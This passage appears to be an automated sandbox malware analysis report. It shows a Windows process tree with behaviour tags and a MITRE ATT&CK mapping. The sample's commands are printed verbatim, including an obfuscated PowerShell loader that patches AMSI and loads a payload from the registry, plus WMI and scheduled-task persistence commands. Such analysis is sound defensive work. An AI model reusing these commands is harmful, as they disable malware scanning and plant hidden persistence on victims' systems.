  C:\Windows\SysWOW64\dllhost.exe /Processid:{4ff4edbb-1cde-4636-ab66-30e735cd67a5}
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4132

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1148
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BjivGZNMUNBi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LHWzVTGfPNiekW,[Parameter(Position=1)][Type]$iYgkYFBBCV)$SJslCuWGDuh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$SJslCuWGDuh.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$LHWzVTGfPNiekW).SetImplementationFlags('Runtime,Managed');$SJslCuWGDuh.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iYgkYFBBCV,$LHWzVTGfPNiekW).SetImplementationFlags('Runtime,Managed');Write-Output $SJslCuWGDuh.CreateType();}$wYCJLqJOyBCHe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sVRMBXSyAtiwZM=$wYCJLqJOyBCHe.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ejgtIrwdUPJzGDqXomb=BjivGZNMUNBi @([String])([IntPtr]);$RNJYjYIiFPMvuxLPDPBBgz=BjivGZNMUNBi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VvQXYYgqTYE=$wYCJLqJOyBCHe.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$hDORxbnldZyMfn=$sVRMBXSyAtiwZM.Invoke($Null,@([Object]$VvQXYYgqTYE,[Object]('Load'+'LibraryA')));$VnZXQgsIWIeTsTLzZ=$sVRMBXSyAtiwZM.Invoke($Null,@([Object]$VvQXYYgqTYE,[Object]('Vir'+'tual'+'Pro'+'tect')));$czbnlAm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hDORxbnldZyMfn,$ejgtIrwdUPJzGDqXomb).Invoke('a'+'m'+'si.dll');$lpVGiWQPKZTXrsbJE=$sVRMBXSyAtiwZM.Invoke($Null,@([Object]$czbnlAm,[Object]('Ams'+'iSc'+'an'+'Buffer')));$mEUHLbGOwB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VnZXQgsIWIeTsTLzZ,$RNJYjYIiFPMvuxLPDPBBgz).Invoke($lpVGiWQPKZTXrsbJE,[uint32]8,4,[ref]$mEUHLbGOwB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lpVGiWQPKZTXrsbJE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VnZXQgsIWIeTsTLzZ,$RNJYjYIiFPMvuxLPDPBBgz).Invoke($lpVGiWQPKZTXrsbJE,[uint32]8,0x20,[ref]$mEUHLbGOwB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$pdemlcoustager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4104
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:CEdkoyUxoERJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EmkSgMGhQAHJsu,[Parameter(Position=1)][Type]$oExOtyrCni)$yxxkHOXzPfc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$yxxkHOXzPfc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EmkSgMGhQAHJsu).SetImplementationFlags('Runtime,Managed');$yxxkHOXzPfc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$oExOtyrCni,$EmkSgMGhQAHJsu).SetImplementationFlags('Runtime,Managed');Write-Output $yxxkHOXzPfc.CreateType();}$IjQSTcsPowMdY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$svqKTQPhtfRYzU=$IjQSTcsPowMdY.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hznMTowyMrZxhsLxOBG=CEdkoyUxoERJ @([String])([IntPtr]);$gBDntdpPgkCMxiImDTwSaI=CEdkoyUxoERJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FFdgUCRLMjs=$IjQSTcsPowMdY.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$WAtRyHTtmeeEOV=$svqKTQPhtfRYzU.Invoke($Null,@([Object]$FFdgUCRLMjs,[Object]('Load'+'LibraryA')));$sdMqmtdKkHKoYTiVm=$svqKTQPhtfRYzU.Invoke($Null,@([Object]$FFdgUCRLMjs,[Object]('Vir'+'tual'+'Pro'+'tect')));$LavSxvh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WAtRyHTtmeeEOV,$hznMTowyMrZxhsLxOBG).Invoke('a'+'m'+'si.dll');$cTikagRbxVKzhiuzq=$svqKTQPhtfRYzU.Invoke($Null,@([Object]$LavSxvh,[Object]('Ams'+'iSc'+'an'+'Buffer')));$NsqTlyqqXL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sdMqmtdKkHKoYTiVm,$gBDntdpPgkCMxiImDTwSaI).Invoke($cTikagRbxVKzhiuzq,[uint32]8,4,[ref]$NsqTlyqqXL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$cTikagRbxVKzhiuzq,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sdMqmtdKkHKoYTiVm,$gBDntdpPgkCMxiImDTwSaI).Invoke($cTikagRbxVKzhiuzq,[uint32]8,0x20,[ref]$NsqTlyqqXL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$pdemlcoustager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
- Drops file in Windows directory
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1448
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1484

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2144

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2608

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
PID:2716

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3432
- C:\Users\Admin\AppData\Local\Temp\f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe
  "C:\Users\Admin\AppData\Local\Temp\f37d9f34f4247d7d47dcc690ab2da3983be5c7e7814aa9d98fda637f7984586b.exe"
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3788
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 5 & Start c:\windows\fonts\xhaubjd\sqnlgfm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 5
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:400
  - - \??\c:\windows\fonts\xhaubjd\sqnlgfm.exe
      c:\windows\fonts\xhaubjd\sqnlgfm.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3536

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3720

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4792

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4860

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3380

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2316

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1392

\??\c:\windows\fonts\xhaubjd\sqnlgfm.exe
c:\windows\fonts\xhaubjd\sqnlgfm.exe
1⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\TEMP\wfeyulda\acbzga.exe
  C:\Windows\TEMP\wfeyulda\acbzga.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="awuqrsom" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="eezqdwaa" DELETE & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='awuqrsom'" DELETE
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1656
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="awuqrsom" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4848
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="eezqdwaa" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2524
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='awuqrsom'" DELETE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="awuqrsom", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" & wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="eezqdwaa",CommandLineTemplate="c:\windows\ime\lgoavey\ovhzrec.exe" & wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="awuqrsom"", Consumer="CommandLineEventConsumer.Name="eezqdwaa""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:400
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3608
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="awuqrsom", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1108
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="eezqdwaa",CommandLineTemplate="c:\windows\ime\lgoavey\ovhzrec.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2380
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="awuqrsom"", Consumer="CommandLineEventConsumer.Name="eezqdwaa""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks /DELETE /TN vdcerqaa /F
  2⤵
  - Indicator Removal: Clear Persistence
  - System Location Discovery: System Language Discovery
  PID:748
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /TN vdcerqaa /F
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 30 /tn "vdcerqaa" /ru system /tr "c:\windows\ime\lgoavey\ovhzrec.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4564
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4268
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 30 /tn "vdcerqaa" /ru system /tr "c:\windows\ime\lgoavey\ovhzrec.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cmd /c powercfg -import c:\windows\fonts\xhaubjd\BestPower.pow
  2⤵
  - Power Settings
  - System Location Discovery: System Language Discovery
  PID:3936
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:2052
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powercfg -import c:\windows\fonts\xhaubjd\BestPower.pow
    3⤵
    - Power Settings
    - System Location Discovery: System Language Discovery
    PID:4332
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg -import c:\windows\fonts\xhaubjd\BestPower.pow
      4⤵
      Power Settings
      System Location Discovery: System Language Discovery
      PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cmd /c powercfg -setactive 5219e480-24ce-4191-860a-86686bc935d7
  2⤵
  - Power Settings
  - System Location Discovery: System Language Discovery
  PID:3684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:60
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powercfg -setactive 5219e480-24ce-4191-860a-86686bc935d7
    3⤵
    - Power Settings
    - System Location Discovery: System Language Discovery
    PID:464
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg -setactive 5219e480-24ce-4191-860a-86686bc935d7
      4⤵
      Power Settings
      PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powercfg -h off
  2⤵
  - Power Settings
  - System Location Discovery: System Language Discovery
  PID:3716
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1804
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg -h off
    3⤵
    - Power Settings
    - System Location Discovery: System Language Discovery
    PID:2288
- \??\c:\windows\fonts\dcjgbeul\gnygcm.exe
  c:\windows\fonts\dcjgbeul\gnygcm.exe
  2⤵
  PID:4364

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 561c53113cae2ed8f1646b3712147f99 pgQTsreS8UOzvFdKU6wD8A.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3732
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1608

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:624

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:1548
- \??\c:\windows\ime\lgoavey\ovhzrec.exe
  c:\windows\ime\lgoavey\ovhzrec.exe
  2⤵
  PID:3388
- \??\c:\windows\ime\lgoavey\ovhzrec.exe
  c:\windows\ime\lgoavey\ovhzrec.exe
  2⤵
  PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1924

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Persistence

T1070.009

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery